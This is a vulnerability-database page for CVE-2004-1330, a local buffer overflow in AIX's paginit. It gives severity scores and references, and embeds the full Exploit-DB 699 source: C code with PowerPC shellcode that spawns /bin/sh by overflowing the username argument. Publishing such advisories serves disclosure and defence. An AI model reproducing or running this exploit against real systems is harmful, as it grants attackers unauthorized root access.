CVE-2004-1330 : Detail

CVE-2004-1330

1.5%V3
Local
2005-01-06
04h00 +00:00
2017-07-10
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in paginit in AIX 5.1 through 5.3 allows local users to execute arbitrary code via a long username.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 699

Publication date : 2004-12-19 23h00 +00:00
Author : cees-bart
EDB Verified : Yes

/* exploit for /usr/bin/paginit tested on: AIX 5.2 if the exploit fails it's because the shellcode ends up at a different address. use dbx to check, and change RETADDR accordingly. cees-bart <ceesb cs ru nl> */ #define RETADDR 0x2ff22c90 char shellcode[] = "\x7c\xa5\x2a\x79" "\x40\x82\xff\xfd" "\x7c\xa8\x02\xa6" "\x38\xe0\x11\x11" "\x39\x20\x48\x11" "\x7c\xc7\x48\x10" "\x38\x46\xc9\x05" "\x39\x25\x11\x11" "\x38\x69\xef\x17" "\x38\x87\xee\xef" "\x7c\xc9\x03\xa6" "\x4e\x80\x04\x20" "\x2f\x62\x69\x6e" "\x2f\x73\x68\x00" ; char envlabel[] = "X="; void printint(char* buf, int x) { buf[0] = x >> 24; buf[1] = (x >> 16) & 0xff; buf[2] = (x >> 8) & 0xff; buf[3] = x & 0xff; } int main(int argc, char **argv) { char *env[3]; char code[1000]; char buf[8000]; char *p, *i; int offset1 = 0; offset1 = 0; // atoi(argv[1]); memset(code, 'C', sizeof(code)); memcpy(code, envlabel,sizeof(envlabel)-1); // landingzone for(i=code+sizeof(envlabel)+offset1; i<code+sizeof(code); i+=4) printint(i, 0x7ca52a79); memcpy(code+sizeof(code)-sizeof(shellcode), shellcode, sizeof(shellcode)-1); code[sizeof(code)-1] = 0; env[0] = code; env[1] = 0; memset(buf, 'A', sizeof(buf)); buf[sizeof(buf)-1] = 0; p = buf; p += 4114; printint(p,RETADDR); // try to hit the landingzone p += 72; printint(p, RETADDR); // any readable address (apparently not overwritten) execle("/usr/bin/paginit", "/usr/bin/paginit", buf, 0, env); } // milw0rm.com [2004-12-20]

Products Mentioned

Configuraton 0

Ibm>>Aix >> Version 5.2

Ibm>>Aix >> Version 5.2.2

Ibm>>Aix >> Version 5.2_l

Ibm>>Aix >> Version 5.3

Ibm>>Aix >> Version 5.3_l

References

http://marc.info/?l=bugtraq&m=110355931920123&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/12043
Tags : vdb-entry, x_refsource_BID